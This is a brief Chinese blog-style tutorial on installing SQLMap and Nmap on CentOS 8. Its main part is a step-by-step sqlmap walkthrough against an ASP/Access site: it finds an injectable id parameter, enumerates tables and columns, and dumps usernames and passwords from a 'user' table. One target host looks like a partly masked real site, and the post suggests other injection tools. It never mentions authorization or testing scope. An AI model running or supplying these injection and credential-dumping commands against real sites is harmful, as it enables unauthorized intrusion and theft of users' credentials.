0

Centos 8 下安装 SQLMap 和 Nmap 以及 Access 数据库简单注入之SQLMap

SQLMap是一个功能很强大的渗透测试工具,而且源码开放,支持的数据库:MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、SQLite等等。

第一步、安装 Python 环境:yum install python -y

第二步、SQLMap 的安装比较简单,把源码下载下来就可以了,安装到指定目录为/usr/local/ ,下载命令:

git clone https://github.com/sqlmapproject/sqlmap.git

第三步、安装 Nmap ,下载编译安装

git clone https://github.com/nmap/nmap.git
cd nmap
./configure
make && make install
make clean

简单演示一下关于sqlmap下注入:

注入漏洞地址:http://www.example.com/showannounce.asp?id=104

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" 【Kali下使用:sqlmap -u "http://jgkd.xxx.com/announceshow.asp?id=203"】

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --tables

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --columns -T user

./sqlmap.py -u "http://www.example.com/showannounce.asp?id=104" --dump -T user -C "name,psw"

中间会提示让你输入线程,输入大概5到10个线程这个样子。上面的user,psw这些视情况而定,灵活应用。

还有如果不熟悉Kali或没有Linux环境的,用啊D,明小子、穿山甲等工具去跑也可以,前提是你字典足够强大!

欢迎评论